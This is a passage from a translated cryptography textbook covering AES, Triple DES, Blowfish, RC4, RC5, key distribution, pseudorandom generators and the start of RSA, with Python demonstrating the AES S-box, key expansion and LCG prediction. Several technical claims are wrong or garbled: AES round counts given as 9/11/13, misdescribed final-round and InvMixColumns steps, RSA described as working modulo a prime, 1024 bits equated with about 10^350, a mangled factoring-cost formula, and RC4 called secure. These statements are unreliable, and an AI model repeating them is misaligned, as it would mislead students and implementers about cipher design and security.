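    c2 = ctr_crypt(b"second message..", key, b"\x00\x00\x00\x01")
    print("CTR reuse leaks P1 xor P2:", xor(c1, c2).hex())
```

ECB exposes the repeated plaintext blocks, CBC hides them, and reusing a key/counter pair in CTR lets the XOR of two ciphertexts equal the XOR of the two plaintexts.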

IV.3 The Advanced Encryption Standard (AES)

IV.3.1 Origins

A replacement for DES was clearly needed, because there are theoretical attacks that can break it, and exhaustive key search attacks have been demonstrated. Triple DES (DES applied three times in succession) can be used for applications that need stronger security, but encryption and decryption are slow and the data block is small. The US National Institute of Standards and Technology (NIST) therefore issued a call for a new encryption standard in 1997. 15 candidates were accepted in June 1998, and they were narrowed down to 5 candidates in June 1999. In October 2000 Rijndael was selected as the Advanced Encryption Standard, and it was published as FIPS PUB 197 in November 2001.

AES requirements

AES is a private-key symmetric block cipher. The data block size is 128 bits and the key length is variable: 128, 192 or 256 bits. The new standard must be stronger and faster than Triple DES. It must have a strong theoretical basis so that the standard has a lifetime of about 20-30 years (plus archival use). Submission as a standard required full design details and a complete specification. The new standard had to be efficiently implementable in both C and Java. NIST published all the submissions and the unclassified analyses.

IV.3.2 AES evaluation criteria

Initial criteria:

o Security: resistance to all practical cryptanalytic attacks.
o Computational cost.
o Algorithm and implementation characteristics.

Final criteria:

o General security.
o Ease of implementation in software and hardware.
o Resistance to implementation attacks.
o Flexibility in encryption/decryption, keying and other factors.

The shortlist of Advanced Encryption Standard candidates:

o MARS (IBM): complex, fast, high security margin.
o RC6 (USA): simple, very fast, low security margin.
o Rijndael (Belgium): clean, fast, good security margin.
o Serpent (Europe): slow, clean, very high security margin.
o Twofish (USA): complex, very fast, high security margin.

These were then subjected to further analysis and evaluation, which concentrated on comparing the different algorithms:

o few complex rounds versus many simple rounds,
o refinement of existing ciphers versus new proposals.

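IV.3.3 The Advanced Encryption Standard: Rijndael

Rijndael was finally selected as the Advanced Encryption Standard. It was designed by Rijmen and Daemen in Belgium and has the following characteristics:

It has 128/192/256-bit keys and a 128-bit data block.
It is an iterative cipher, somewhat different from a Feistel cipher:

o the data is divided into 4 groups of 4 bytes,
o every round operates on the whole block,
o it was designed to:
  - resist known attacks,
  - be fast and compact in code on many CPUs,
  - be simple in design.

The 128-bit data block is processed as 4 groups of 4 bytes: 128 = 4*4*8 bits. Each group lies on one row. The matrix of 4 rows and 4 columns, each element being 1 byte, is the state that is processed through the encryption and decryption rounds. The key is expanded into an array of 44 32-bit words w[i]. There are 9/11/13 rounds, depending on the option, and each round consists of:

o byte substitution (one S-box applied to every byte),
o shift rows (a permutation of bytes between groups/columns),
o mix columns (using matrix multiplication on the columns),
o add round key (XOR of the data state with the round key).
o All operations are carried out with XORs and table lookups, so the cipher is very fast and efficient.

[Figure: Rijndael structure]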


Byte substitution

o A simple substitution of each byte.
o It uses one 16 x 16 table of bytes containing a permutation of all 256 8-bit values.
o Each byte of the state is replaced by the byte in the row given by its left 4 bits and the column given by its right 4 bits. For example, {95} is replaced by the entry in row 9, column 5, whose value is {2A}.
o The S-box is constructed using a transformation of the values in GF(2^8), as defined in the previous chapter.
o It is designed to resist all known attacks.

Shift rows

o Each row is shifted circularly:
  - row 1 is unchanged,
  - row 2 is rotated 1 byte to the left,
  - row 3 is rotated 2 bytes to the left,
  - row 4 is rotated 3 bytes to the left.
o Decryption performs the reverse shifts, to the right.
o Because the state is processed by columns, this step is in effect a permutation of bytes between the columns.

Mix columns

o Each column is processed separately.
o Each byte is replaced by a value that depends on all 4 bytes in the column.
o It is in effect a matrix multiplication in GF(2^8), using the prime polynomial m(x) = x^8 + x^4 + x^3 + x + 1.

o Each new column can be expressed as the solution of 4 equations that give the new bytes in the column.
o Decryption requires the inverse matrix; its larger coefficients make the computation harder.
o The columns have another characterisation:
  - each column is a polynomial of degree 3 with 4 terms,
  - each coefficient is a byte, corresponding to an element of GF(2^8),
  - the polynomials are multiplied modulo (x^4 + 1).

Add round key

o The state is XORed with 128 bits of the round key.
o It is again processed by column (in effect a series of bit operations).
o The inverse for decryption is fully determined, because XOR is its own inverse; the same XOR is applied with the corresponding round key.
o It is designed to be as simple as possible:
  - it is a form of Vernam cipher on the expanded key,
  - the other steps are needed to add complexity and security.

[Figure: One AES round]

AES key expansion

o The 128-bit (16-byte) key is expanded into an array of 44/52/60 32-bit words.
o It starts by copying the key into the first 4 words.
o It then loops, creating words that depend on the values in the previous position and 4 positions back:
  - in 3 out of 4 cases these are simply XORed together,
  - for every 4th word, the previous word is rotated, passed through the S-box and XORed with a constant before the two are XORed together.
o It is designed to resist known attacks.
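The byte-substitution table and the key expansion described above can be checked with a short program. This is an added example, not code from the textbook: it builds the S-box from the GF(2^8) inverse modulo m(x) followed by the standard FIPS-197 affine map (the affine map and the Nr = Nk + 6 round count come from FIPS-197, not from this page), then expands a key; function names are hypothetical, and the sample key is the one published in FIPS-197 Appendix A.

```python
M_POLY = 0x11B  # m(x) = x^8 + x^4 + x^3 + x + 1


def gmul(a: int, b: int) -> int:
    """Multiply two bytes as polynomials in GF(2^8) modulo m(x)."""
    p = 0
    while b:
        if b & 1:
            p ^= a          # add (XOR) the current multiple of a
        a <<= 1             # multiply a by x
        if a & 0x100:
            a ^= M_POLY     # reduce modulo m(x)
        b >>= 1
    return p


def ginv(a: int) -> int:
    """Multiplicative inverse a^254 in GF(2^8); 0 is mapped to 0."""
    r = 1
    for _ in range(254):
        r = gmul(r, a)
    return r


def rotl8(x: int, n: int) -> int:
    return ((x << n) | (x >> (8 - n))) & 0xFF


def build_sbox() -> list:
    box = []
    for x in range(256):
        b = ginv(x)
        # FIPS-197 affine transformation over GF(2), constant {63}
        box.append(b ^ rotl8(b, 1) ^ rotl8(b, 2) ^ rotl8(b, 3) ^ rotl8(b, 4) ^ 0x63)
    return box


SBOX = build_sbox()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def sub_word(w: bytes) -> bytes:
    return bytes(SBOX[b] for b in w)     # S-box applied to each of the 4 bytes


def rot_word(w: bytes) -> bytes:
    return w[1:] + w[:1]                 # [a0 a1 a2 a3] -> [a1 a2 a3 a0]


def key_expansion(key: bytes) -> list:
    """Expand a 16/24/32-byte key into 44/52/60 four-byte words."""
    nk = len(key) // 4
    nr = nk + 6                          # rounds, as defined in FIPS-197
    w = [key[4 * i:4 * i + 4] for i in range(nk)]   # copy the key first
    rcon = 1                             # x^(i-1) in GF(2^8), with x = {02}
    for i in range(nk, 4 * (nr + 1)):
        temp = w[i - 1]
        if i % nk == 0:
            temp = xor(sub_word(rot_word(temp)), bytes([rcon, 0, 0, 0]))
            rcon = gmul(rcon, 2)
        elif nk > 6 and i % nk == 4:
            temp = sub_word(temp)        # extra substitution for 256-bit keys
        w.append(xor(w[i - nk], temp))
    return w


if __name__ == "__main__":
    print("S-box {95} ->", format(SBOX[0x95], "02X"))
    words = key_expansion(bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c"))
    print(len(words), "words; w[4] =", words[4].hex(), "w[43] =", words[43].hex())
```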


AES decryption

o Decryption is not identical to encryption, because the steps are carried out in reverse order.
o An equivalent inverse cipher can nevertheless be defined with the same sequence of steps as encryption,
  - but using the inverse of each step,
  - with a different key schedule.
o This works because the result is unchanged when
  - the byte substitution and shift rows steps are swapped,
  - the mix columns and add round key steps are swapped.
o Rationale for the key expansion; the design criteria included:
  - knowing part of the key is not enough to learn more, that is, the other subkeys or the key as a whole,
  - the transformation is invertible,
  - it is fast on a wide range of CPUs,
  - round constants are used to break symmetry,
  - key bits are diffused into the round subkeys,
  - there is enough non-linearity to resist cryptanalysis,
  - simplicity in decryption.
o Implementation aspects:
  It can be implemented efficiently on an 8-bit CPU:
  - byte substitution works on bytes using a table with 256 entries,
  - shift rows is a simple byte shift,
  - add round key works as a byte XOR,
  - mix columns requires matrix multiplication in GF(2^8), which works on byte values and can be simplified to table lookups.
  It can be implemented efficiently on a 32-bit CPU:
  - the steps are redefined to use 32-bit words,
  - 4 tables with 256 entries can be precomputed,
  - each column in each round can then be computed with 4 table lookups and 4 XORs,
  - 16 Kb are needed to store the tables.

The designers believe that this very efficient implementation was a key factor in its selection as the AES cipher.

We now look in more detail at AES encryption, key generation and decryption. The encryption process consists of 4 steps:

1. AddRoundKey: each byte of the block is combined with the subkey; the subkeys are produced by the Rijndael key schedule.

Figure 2.5: Operation of the AddRoundKey step

2. SubBytes: a (non-linear) substitution in which each byte is replaced by another byte according to a lookup table (see the corresponding documentation).

Figure 2.6: Operation of the SubBytes step

3. ShiftRows: a transposition in which the rows of the block are shifted cyclically.

Figure 2.7: Operation of the ShiftRows step

4. MixColumns: a mixing operation that works on the columns of the block using a linear transformation.

Figure 2.8: Operation of the MixColumns step

In the final round the MixColumns step is replaced by the AddRoundKey step.

Encryption algorithm

INPUT: M, 128 bits; w[Nb*(Nr+1)] -- w is the key array, M is the plaintext data block
OUTPUT: Y, 128 bits -- the encrypted data block
PROCESSING:
   state := M;
   AddRoundKey(state, w[0, Nb-1]);
   for i in 1..Nr-1 loop
      SubBytes(state);
      ShiftRows(state);
      MixColumns(state);
      AddRoundKey(state, w[i*Nb, (i+1)*Nb-1]);
   end loop;
   SubBytes(state);
   ShiftRows(state);
   AddRoundKey(state, w[Nr*Nb, (Nr+1)*Nb-1]);
   Y := state;

The subkey generation algorithm uses three functions:

o SubWord(): passes the 4 bytes of an input word through the S-box to give the 4 bytes of the output word.
o RotWord(): transforms a word [a0 a1 a2 a3] into the word [a1 a2 a3 a0].
o Rcon(i): contains the values [x^(i-1), {00}, {00}, {00}] with x = {02} and i >= 1.

When Nk = 8 (key length 256) and i-4 is a multiple of Nk, SubWord() is applied to w[i-1] before the XOR.

Algorithm:

INPUT: input key K, Nk
OUTPUT: the subkey array
PROCESSING:
   Split the key K into Nk 4-byte blocks w[i], i = 0..Nk-1
   i := Nk;
   while (i < Nb*(Nr+1)) loop
      temp := w[i-1];
      if (i mod Nk = 0) then
         temp := SubWord(RotWord(temp)) xor Rcon[i/Nk];
      else if (Nk > 6 and i mod Nk = 4) then
         temp := SubWord(temp);
      end if;
      w[i] := w[i-Nk] xor temp;
      i := i + 1;
   end loop;

The decryption algorithm uses 4 transformations: the AddRoundKey transformation and 3 inverse transformations.

o InvShiftRows(): like ShiftRows, except that the rows are shifted right instead of left.
o InvSubBytes(): like SubBytes(), except that the inverse S-box is used instead of the S-box.
o InvMixColumns(): like MixColumns, except that instead of a XOR with c(x) it uses a^-1 XOR with c(x).

Decryption algorithm

INPUT: M, 128 bits; w[Nb*(Nr+1)] -- w is the key array, M is the ciphertext
OUTPUT: Y, 128 bits -- the decrypted data block
PROCESSING:
   state = M
   AddRoundKey(state, w[Nr*Nb, (Nr+1)*Nb-1])
   for round = Nr-1 step -1 downto 1
      InvShiftRows(state)
      InvSubBytes(state)
      AddRoundKey(state, w[round*Nb, (round+1)*Nb-1])
      InvMixColumns(state)
   end for
   InvShiftRows(state)
   InvSubBytes(state)
   AddRoundKey(state, w[0, Nb-1])
   Y = state

IV.4 Contemporary symmetric ciphers

IV.4.1 Triple DES

Multiple encryption with DES

DES clearly needed to be replaced, because

o theoretical attacks can break it,
o exhaustive key search attacks have been demonstrated.

AES is the new replacement cipher. Before it, repeated DES was used, that is, the same algorithm applied several times, possibly with different keys. Triple DES, in which DES is applied 3 times, is the form that was chosen.

Why Triple DES?

o Why not apply DES twice (Double DES)? Applying DES twice is not in general the same as a single DES with some key, although it could be.
o DES can be applied twice to a block with two keys K1 and K2: C = E_K2(E_K1(P)).
o The question is whether this reduces to a single step.
o Double DES is subject to the meet-in-the-middle attack:
  - it applies whenever a cipher is used twice as above,
  - because X = E_K1[P] = D_K2[C],
  - the attack encrypts P with every key and stores the results,
  - then decrypts C with every key and looks for a match, which gives X,
  - it can be shown that this takes O(2^56) steps.

Triple DES with 2 keys

o To avoid the meet-in-the-middle attack, 3 encryptions are needed, and so in general 3 different keys could be used.
o For simplicity, 2 keys can be used in the sequence E-D-E, that is, encrypt, decrypt, then encrypt again:
   C = E_K1[D_K2[E_K1[P]]]
  - with respect to security, encryption and decryption are equivalent,
  - if K1 = K2, this is equivalent to a single DES,
  - standardised in ANSI X9.17 and ISO8732,
  - no practical attacks are known.

Triple DES with 3 keys

o Although there are no practical attacks, Triple DES with 2 keys has some indications that certain special cases should be avoided.
o To avoid them, 3 DES operations with 3 keys should be used:
   C = E_K3[D_K2[E_K1[P]]]
o This has been adopted by several Internet applications: PGP, S/MIME.

IV.4.2 Blowfish

Blowfish is a symmetric cipher designed by Schneier around 1993-1994. It has the following characteristics:

o Fast implementation on 32-bit CPUs.
o Low memory usage.
o Simple structure, easy to implement and to analyse.
o Security that varies with the key length.

It has been implemented in many different products.

Blowfish subkey schedule

o It uses a key of flexible length, from 32 to 448 bits.
o The key is used to generate
  - 18 32-bit subkeys stored in the K array: K_j,
  - four 8 x 32 S-boxes stored in S_i,j.
o The key schedule consists of:
  - initialising the P array and then the 4 S-boxes,
  - XORing the P array with the key bits (reusing them as needed),
  - repeatedly encrypting data using the current P and S and replacing successive pairs of P, then of S,
  - this requires 512 keys, so obtaining new subkeys is slow.
o Blowfish encryption
  - uses 2 basic operations, addition and XOR,
  - the data is divided into two 32-bit halves L0 and R0:

   for i = 1 to 16 do
      R_i = L_(i-1) XOR P_i;
      L_i = F[R_i] XOR R_(i-1);
   L_17 = R_16 XOR P_18;
   R_17 = L_16 XOR P_17;

  where F[a,b,c,d] = ((S_1,a + S_2,b) XOR S_3,c) + S_4,d

o Discussion:
  - the subkeys and S-boxes depend on the key and are produced using the cipher itself, which makes analysis very hard,
  - swapping the two halves after every round increases security,
  - the key is large enough that exhaustive key search is impractical, especially given the cost of the subkey schedule.

IV.4.3 RC4

RC4 is a proprietary cipher owned by RSADSI, designed by Ronald Rivest. RC4 is simple but effective; it has a variable key size and is a stream cipher. It is widely used (web SSL/TLS, wireless WEP). The key produces a random permutation of all 8-bit values. That permutation is used to scramble the input, which is processed one byte at a time.

RC4 key schedule

o Start with an array S holding the values 0..255.
o Use the key to shuffle it thoroughly.
o S forms the internal state of the cipher.

RC4 encryption

o Encryption continues to shuffle the array values.
o The sum of the shuffled pair selects the stream key value from the permutation.
o S[t] is XORed with the next byte of the message to encrypt or decrypt it:

   i = j = 0
   for each message byte M_i
      i = (i + 1) (mod 256)
      j = (j + S[i]) (mod 256)
      swap(S[i], S[j])
      t = (S[i] + S[j]) (mod 256)
      C_i = M_i XOR S[t]

[Figure: RC4 overview]

RC4 security

o RC4 is claimed to be secure against known attacks.
o There are some cryptanalytic results, but none is practical.
o The output is highly non-linear.
o Because RC4 is a stream cipher, a key must never be reused.
o There are concerns with WEP, but they stem from key management rather than from RC4 itself.

IV.4.4 RC5

RC5 is also a proprietary cipher owned by RSADSI, designed by Ronald Rivest and used in many RSADSI products. RC5 has variable key and data sizes and, notably, a variable number of rounds. Its design is very simple and clean. RC5 is easy to implement on many CPUs and is still considered secure.

The RC5 ciphers

o RC5 is a family of ciphers with three parameters, RC5-w/r/b:
  - w is the word size (16/32/64); the number of data bits is 2w,
  - r is the number of rounds (0..255),
  - b is the number of bytes in the key (0..255).
o The nominal version is RC5-32/12/16:
  - that is, 32-bit words, so it encrypts 64-bit data blocks,
  - using 12 rounds,
  - with a 16-byte (128-bit) key.

o RC5 key expansion
  RC5 uses 2r + 2 subkey words (w bits each).
  The subkeys are stored in the array S[i], i = 0, 1, ..., t-1.
  The key schedule then consists of:
  - initialising S to a fixed pseudorandom value, based on the constants e and phi,
  - copying the key bytes into a c-word array L,
  - a mixing operation that combines L and S into the final array S.

RC5 encryption

o The input is split into 2 halves A and B:

   L_0 = A + S[0];
   R_0 = B + S[1];
   for i = 1 to r do
      L_i = ((L_(i-1) XOR R_(i-1)) <<< R_(i-1)) + S[2 x i];
      R_i = ((R_(i-1) XOR L_i) <<< L_i) + S[2 x i + 1];

o Each round is like 2 DES rounds.
o The rotation is the main source of non-linearity.
o A reasonable number of rounds is needed (12-16).

RC5 modes

o RFC2040 defines 4 modes for RC5:
  - RC5 block cipher, that is, ECB mode,
  - RC5-CBC,
  - RC5-CBC-PAD, the mode with padding by bytes whose value is the number of pad bytes,
  - RC5-CTS, a variant of CBC whose output has the same size as the original message.

IV.4.5 Characteristics of block ciphers and stream ciphers

1. Block cipher characteristics. The features found in modern block ciphers are:

o variable key length / block size / number of rounds,
o mixed operators, and key-dependent or data-dependent rotations,
o key-dependent S-boxes,
o more complex subkey generation,
o operations on the full data in each round,
o varying non-linear functions.

2. Stream cipher characteristics

o The message is processed bit by bit.
o There is typically a (pseudo)random stream key.
o It is XORed with the plaintext bit by bit.
o The randomness of the stream key completely destroys any statistical properties of the message:
   C_i = M_i XOR StreamKey_i
o Very simple.
o But the key must never be reused.

3. Properties to consider when designing a stream cipher

a. A long period with no repetitions
b. Statistically random
c. Depends on a sufficiently large key
d. High linear complexity
e. Confusion
f. Diffusion
g. Use of highly non-linear Boolean functions

IV.5 Confidentiality using symmetric encryption

IV.5.1 Requirements

Symmetric encryption is traditionally used to keep messages secret. Consider a typical scenario:

o workstations on one LAN access workstations and servers on another LAN,
o the networks are interconnected using switches/routers,
o over physical links or wireless/satellite links.

Consider the attacks and the placement of encryption in this scenario:

o snooping from another workstation,
o using a connection to the network or to a server to snoop,
o using an external connection to break in and snoop,
o monitoring and/or modifying traffic on the external links.

There are two main approaches to where encryption is placed.

Link encryption

o Encryption occurs independently on every link.
o This implies that traffic must be decrypted between links.
o It requires many devices and paired keys.

End-to-end encryption

o Encryption occurs between the original source and the final destination.
o It requires devices at each end and shared keys.

IV.5.2 Traffic analysis

With end-to-end encryption the header information must be left in the clear so that the network can route the information correctly. Hence, although the content is protected, the traffic pattern is not. Ideally both should be kept secret. End-to-end encryption protects the content over the whole path and provides authentication, whereas link encryption protects the traffic flow from monitoring.

Placement of encryption

Encryption can be placed at various layers of the OSI reference model:

o link encryption is performed at layer 1 or 2,
o end-to-end encryption can be performed at layers 3, 4, 6, 7,
o moving to higher layers, less information is encrypted but it is more secure, because the users keep the keys secret; it is, however, more complex, with more entities and keys.

Traffic analysis

Traffic analysis is the monitoring of the communication flows between two parties:

o it is useful in both military and commercial settings,
o it can also be used to create a monitoring channel,
o link encryption obscures the header details, but the overall traffic volumes in the network and at the end points are still visible.

Traffic padding can further obscure the flows, but at the cost of transmitting continuously, at a rate that is almost constant over time.

IV.5.3 Key distribution

Symmetric schemes require both parties to share a common secret key. The question is how to distribute this secret key. Cryptosystems often fail because the key is compromised in the key distribution scheme. Given two parties A and B, there are several alternatives for key distribution:

2. A selects a key and physically delivers it to B.
3. A third party selects the key and delivers it to A and B.
4. If A and B have communicated previously, they can use the previous key to encrypt a new key.
5. If A and B each have secure communications with a third party C, C can relay the key between A and B.

[Figure: Key distribution scenario]

Key hierarchy

Keys are usually classified as follows.

Session key:

o a temporary key,
o used to encrypt data between a group of users,
o for one logical session, then discarded.

Master key:

o used to encrypt session keys,
o shared between a user and the key distribution centre.

Key distribution issues

Large networks require a hierarchy of key distribution centres (KDCs), but trust must be established between users and the centres and between the centres themselves. The lifetime of session keys should be limited for greater security. Automatic key distribution can be used on behalf of users, but the system must be trusted, and the keys issued should be generated as randomly as possible. Decentralised and hierarchical key distribution is needed. Controls on the purposes for which keys are used should also be supported.

IV.5.4 Random numbers

Random numbers have many uses in cryptography: for example, the authentication values used in authentication protocols to prevent replay, session keys, and the keystream for a one-time pad. A mechanism for public-key generation is also needed. In many cases it is critical that these values be

o statistically random, with a uniform distribution, and independent,
o unpredictable: future values cannot be inferred from previous values.

Natural random number generation

The best source is natural randomness in the real world. One looks for some regularly occurring but random event. In general some means of capturing it is needed, for example: radio waves, radio noise, thermal noise in diodes, and so on. Such sources are starting to be seen in new CPUs. There are problems of bias and uneven distribution in the signals, which have to be corrected:

o this must be compensated for when the samples are taken and used,
o it is best to use only the few noisiest bits from each sample.

Published random number sources

A few collections of random numbers have been published. The Rand Co. published more than 1 million random numbers in 1955, generated using an electronic roulette wheel; they have been used in the design of some ciphers such as Khafre. Earlier, in 1927, Tippett published a collection of random numbers. The problems are that

o the supply of random numbers is limited,
o they are well known and are used in many applications.

Pseudorandom number generators (PRNGs)

A deterministic algorithmic technique is used to create random numbers. Although they are not truly random, they must pass many tests of randomness. Such numbers are known as pseudorandom numbers, and the generators as pseudorandom number generators (PRNGs).

Linear congruential generator

The aim is to generate a sequence of random numbers. Take three numbers a, c, m and an initial value for the sequence. The common iterative technique creates the next number from the previous one:

   X_(n+1) = (a*X_n + c) mod m

Given suitable values and parameters, it can produce a fairly long random-like sequence. Suitable criteria are:

o the function generates a full period,
o the generated sequence should appear random,
o efficient implementation with 32-bit arithmetic.
o Note that an attacker can reconstruct the sequence given a small number of its values.
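The full-period criterion and the last note above can both be seen in a few lines. This is an added example, not code from the textbook: all parameter values are constructed for illustration, the function names are hypothetical, and the recovery step assumes the modulus m is known and prime.

```python
def lcg(a: int, c: int, m: int, seed: int, count: int) -> list:
    """Return `count` successive values of X_(n+1) = (a*X_n + c) mod m."""
    out, x = [], seed
    for _ in range(count):
        x = (a * x + c) % m
        out.append(x)
    return out


def period(a: int, c: int, m: int, seed: int) -> int:
    """Length of the cycle the generator falls into when started from `seed`."""
    seen = {}
    x, n = seed, 0
    while x not in seen:
        seen[x] = n
        x = (a * x + c) % m
        n += 1
    return n - seen[x]


def recover_params(x0: int, x1: int, x2: int, m: int) -> tuple:
    """Solve for (a, c) from three consecutive outputs, m prime and known.

    x1 = a*x0 + c and x2 = a*x1 + c (mod m), so a = (x2 - x1) / (x1 - x0).
    The division uses Fermat's theorem: d^(m-2) is the inverse of d mod a prime m.
    """
    d = (x1 - x0) % m
    if d == 0:
        raise ValueError("outputs are constant; a and c cannot be separated")
    a = (x2 - x1) * pow(d, m - 2, m) % m
    c = (x1 - a * x0) % m
    return a, c


def predict_next(outputs: list, m: int) -> int:
    """Predict the value following three observed consecutive outputs."""
    a, c = recover_params(outputs[0], outputs[1], outputs[2], m)
    return (a * outputs[2] + c) % m


if __name__ == "__main__":
    # Constructed small case, m = 31: the multiplier decides the period.
    print("a=3 period:", period(3, 0, 31, 1))   # 3 is a primitive root mod 31
    print("a=5 period:", period(5, 0, 31, 1))   # 5^3 = 1 mod 31: very short cycle

    # Constructed 31-bit generator; the "observer" sees three outputs only.
    m, a, c, seed = 2**31 - 1, 16807, 12345, 2010
    seq = lcg(a, c, m, seed, 4)
    print("recovered (a, c):", recover_params(seq[0], seq[1], seq[2], m))
    print("prediction correct:", predict_next(seq[:3], m) == seq[3])
```

Because three outputs determine every later one, a linear congruential generator must not be used to produce session keys or other secret values.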

Using block ciphers as pseudorandom number generators

A block cipher can be used to generate pseudorandom numbers:

o in counter mode: X_i = E_Km[i],
o in output feedback mode: X_i = E_Km[X_(i-1)].

The ANSI X9.17 PRNG uses the date and time, a seed value and Triple DES encryption to generate a new seed and a random number.

Blum Blum Shub generator

This generator is based on public-key algorithms. It uses the least significant bit of the iterated equation

   x_(i+1) = x_i^2 mod n

where n = p.q and the primes p, q = 3 mod 4. It guarantees the property that the next bit cannot be predicted. Its security rests on the difficulty of factoring N. It is unpredictable even given any run of previous bits. It is slow, however, because very large numbers must be used. It is far too slow for use in encryption, so it is used only for key generation.

Exercises

1. Write out the two sequences generated by the following equations:
   X_(n+1) = (6*X_n) mod 13
   X_(n+1) = (7*X_n) mod 13
   Show that both sequences have full period. Which one appears more random?
2. Write out the sequences given by the following equations:
   x_(i+1) = x_i^2 mod 21 and x_(i+1) = x_i^2 mod 33
   What can be said about their randomness?
3. Draw the block diagram of DES encryption. State the characteristics of DES.
4. Draw the block diagram of AES encryption. State the characteristics of AES.
5. Describe the scheme in which a third party distributes a secret key between two users. State the advantages and disadvantages of this scheme.
6. Can a secret key be used to create a digital signature, that is, some mark attached to the content of the message that only the sender can produce, such that the receiver can read the message and verify that the sender wrote its content?
7. Describe the characteristics of block ciphers, of the DES standard and of the AES standard.

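CHAPTER 5: PUBLIC-KEY CRYPTOGRAPHY AND KEY MANAGEMENT

V.1 Public-key cryptography

Private-key cryptography

Private-key cryptography is also called single-key or secret-key cryptography. Only one key is used, shared by the sender and the receiver. When this key is used, the exchange of information about the key is agreed in advance. It is also called symmetric cryptography, because the two parties play equal roles. It therefore does not protect the sender against the receiver forging a message and claiming that it was sent by the sender. In other words, when two people use symmetric encryption they keep the content of their exchange secret, but the message itself carries no information that authenticates the sender.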

V.1.1 Public-key cryptography

Public-key cryptography appeared in the early 1970s. It is arguably the most significant advance in the 3000-year history of cryptography. It uses 2 keys: a private key and a public key. The two keys are different and are not symmetric with each other, so public-key cryptography is also called asymmetric cryptography. It makes clever use of results from number theory about functions. Public-key cryptography complements private-key cryptography in solving certain security problems; it does not replace it. Both coexist, develop and complement each other.

Public-key/two-key/asymmetric cryptography involves the use of 2 keys:

o a public key, known to everyone, used to encrypt messages and to verify signatures,
o a private key, known only to the recipient, used to decrypt messages or to create signatures.
o It is asymmetric because those who encrypt messages or verify signatures cannot decrypt messages or create signatures.


[Figure: Public-key encryption scheme]

V.1.2 Why public-key cryptography?

It was developed to address two key issues that arise in practice:

o key distribution: how to distribute keys securely without having to rely on a trusted key distribution centre,
o digital signatures: how to verify that a message arrives intact from the person named as its sender.

With symmetric keys alone there is no solution to these two problems. Public-key cryptography was publicly invented by Whitfield Diffie and Martin Hellman at Stanford University in 1976. The initial concept, however, was known earlier in the scientific community.

V.1.3 Characteristics of public-key cryptography

Public-key algorithms use 2 keys with the following characteristics:

o It is computationally infeasible to find the decryption key knowing only the encryption algorithm and the encryption key.
o It is easy to encrypt or decrypt a message when the corresponding key is known.
o In some schemes, either of the two keys can be used for encryption, with the other used for decryption; their roles are interchangeable.

V.1.4 Applications of public-key cryptography
The applications of public-key cryptography can be classified into three different categories:
o Encryption/decryption: provides confidentiality. This is the traditional confidentiality application, the same as with symmetric keys.
o Digital signatures: provide authentication. This is one of the new applications of public-key cryptography that symmetric keys cannot provide: a public key gives sufficient grounds to identify the sender and can be an option for creating the sender's digital signature.
Some public-key algorithms are suitable for all applications, while others are specific to one application.

V.1.5 Security of public-key schemes
As with private-key cryptography, a brute-force search is always possible: knowing one of the two keys and the encryption algorithm, one can in principle search for the second key by computing the related values. In general the amount of computation required is very large because of the complexity of the key-determination problem. If the key is very large, more than about 512 bits, finding the second key is practically infeasible and cannot be carried out in meaningful time, however large the resources. Security rests on a sufficiently large gap between the easy problem (encrypting/decrypting with the key) and the hard problem (cryptanalysis without the corresponding key). The cryptanalysis problem belongs to a more general class of known hard problems, and in theory it has been shown to be very hard to carry out in practice. Because it requires very large numbers, the number of operations to perform is very large. This is the main idea behind a public-key cipher: look for problems that are very easy to solve when some hidden secret information is known, and that otherwise belong to a class of very hard problems, practically unsolvable. Public-key ciphers are usually considerably slower than symmetric ciphers, so they are normally used to encrypt small, important pieces of information.

V.2 RSA
RSA is a public-key cipher invented by Rivest, Shamir and Adleman at MIT (Massachusetts Institute of Technology) in 1977. RSA is the best known and most widely used public-key cipher today. It is based on exponentiation in a finite field of integers modulo a prime. Specifically, encryption and decryption are exponentiations modulo a very large number. Cryptanalysis, that is, finding the private key from the public key, relies on the hard problem of factoring that very large number into primes. With no further information, one has to test the number for divisibility by every prime smaller than its square root in turn, which is infeasible.
It has been shown that exponentiation takes $O((\log n)^3)$ operations, so exponentiation can be regarded as an easy problem. Note that very large numbers of about 1024 bits are used here, that is, about $10^{350}$. Security rests on the difficulty of factoring large numbers. Factoring requires $O(e^{\log n \log\log n})$ operations, which is a hard problem.

V.2.1 RSA key setup
Each user generates a public/private key pair as follows:

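Choose two large primes $p$ and $q$ at random.
Compute the system modulus: $N = p \cdot q$
o We know that $\varphi(N) = (p-1)(q-1)$
o The Chinese Remainder Theorem can be used to reduce the computation
Choose the encryption key $e$ at random
o where $1 < e < \varphi(N)$, $\gcd(e, \varphi(N)) = 1$
Solve the following equation to find the decryption key $d$ such that
o $e \cdot d = 1 \bmod \varphi(N)$ with $0 \le d \le \varphi(N)$
Publish the public encryption key KU = {e, N}
Keep the private key secret KR = {d, p, q}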

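V.2.2 Using RSA
To encrypt a message, the sender:
o obtains the receiver's public key KU = {e, N}
o computes $C = M^e \bmod N$, where $0 \le M < N$
To decrypt the ciphertext, the owner (receiver):
o uses the private key KR = {d, p, q}
o computes $M = C^d \bmod N$
Note that the message must satisfy $M < N$, so the plaintext is split into blocks when necessary.

Why RSA works
By Euler's theorem
o $a^{\varphi(N)} \bmod N = 1$ where $\gcd(a, N) = 1$
o We have $N = p \cdot q$
o $\varphi(N) = (p-1)(q-1)$
o $e \cdot d = 1 \bmod \varphi(N)$
o $e \cdot d = 1 + k \cdot \varphi(N)$ for some value $k$.
Hence
o $C^d = (M^e)^d = M^{1 + k\varphi(N)} = M^1 \cdot (M^{\varphi(N)})^k$
which gives
$C^d \bmod N = M^1 \cdot (1)^k \bmod N = M^1 \bmod N = M \bmod N$

Example
1. Choose the primes: p = 17 and q = 11.
2. Compute n = pq, n = 17 × 11 = 187
3. Compute $\varphi(n) = (p-1)(q-1) = 16 \times 10 = 160$
4. Choose e with gcd(e, 160) = 1; take e = 7
5. Determine d: de = 1 mod 160 and d < 160. The required value is d = 23, since 23 × 7 = 161 = 1 × 160 + 1
6. Publish the public key KU = {7, 187}
7. Keep the private key secret KR = {23, 17, 11}
An example of applying the RSA cipher above:
Given the message M = 88 (so 88 < 187)
Encryption: $C = 88^7 \bmod 187 = 11$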

Decryption: $M = 11^{23} \bmod 187 = 88$
The Chinese Remainder Theorem can be used to decrypt faster, as follows:
a. Compute $11^{23} \bmod 11 = 0$
b. Compute $11^{23} \bmod 17 = (-6)^{23} \bmod 17 = (-6)^{16}(-6)^4(-6)^2(-6) \bmod 17 = 3$,
